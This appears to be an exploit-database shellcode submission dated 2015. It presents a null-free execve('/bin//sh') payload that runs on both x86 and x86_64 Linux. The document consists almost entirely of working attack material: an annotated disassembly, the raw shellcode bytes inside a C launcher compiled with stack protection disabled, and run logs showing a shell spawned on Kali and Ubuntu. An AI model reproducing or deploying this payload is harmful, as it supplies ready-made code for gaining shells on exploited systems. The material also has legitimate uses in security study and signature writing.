#Cross-Linux execve shellcode [works on x86/x86_64] #Coded by B3mB4m #4.11.2015 #This shellcodes works on both x86 and x64(null-free) :> Disassembly of section .text: 08048060 <.text>: 8048060: 31 c0 xor %eax,%eax 8048062: 40 inc %eax 8048063: 74 15 je 0x804807a 8048065: 31 c0 xor %eax,%eax 8048067: 50 push %eax 8048068: 68 2f 2f 73 68 push $0x68732f2f 804806d: 68 2f 62 69 6e push $0x6e69622f 8048072: 89 e3 mov %esp,%ebx 8048074: 89 c2 mov %eax,%edx 8048076: b0 0b mov $0xb,%al 8048078: cd 80 int $0x80 804807a: 48 dec %eax 804807b: 31 c0 xor %eax,%eax 804807d: 48 dec %eax 804807e: 83 c0 3b add $0x3b,%eax 8048081: 48 dec %eax 8048082: 31 ff xor %edi,%edi 8048084: 57 push %edi 8048085: 48 dec %eax 8048086: bf 2f 62 69 6e mov $0x6e69622f,%edi 804808b: 2f das 804808c: 2f das 804808d: 73 68 jae 0x80480f7 804808f: 57 push %edi 8048090: 48 dec %eax 8048091: 8d 3c 24 lea (%esp),%edi 8048094: 48 dec %eax 8048095: 31 f6 xor %esi,%esi 8048097: 48 dec %eax 8048098: 31 d2 xor %edx,%edx 804809a: 0f 05 syscall #include #include #gcc -fno-stack-protector -z execstack shell.c -o shell unsigned char shellcode[] = "\x31\xc0\x40\x74\x15\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc2\xb0\x0b\xcd\x80\x48\x31\xc0\x48\x83\xc0\x3b\x48\x31\xff\x57\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x48\x8d\x3c\x24\x48\x31\xf6\x48\x31\xd2\x0f\x05"; int main(void){ fprintf(stdout,"Length: %d\n",strlen(shellcode)); (*(void(*)()) shellcode)(); } x86 ===== root@b3mb4m:~/Desktop# uname -a Linux b3mb4m 4.0.0-kali1-686-pae #1 SMP Debian 4.0.4-1+kali2 (2015-06-03) i686 GNU/Linux root@b3mb4m:~/Desktop# ./shell Length: 60 # x64 ===== root@whoami:/home/whoami/Desktop# uname -a Linux whoami 3.19.0-33-generic #38~14.04.1-Ubuntu SMP Fri Nov 6 18:17:28 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux root@whoami:/home/whoami/Desktop# ./shell Length: 60 #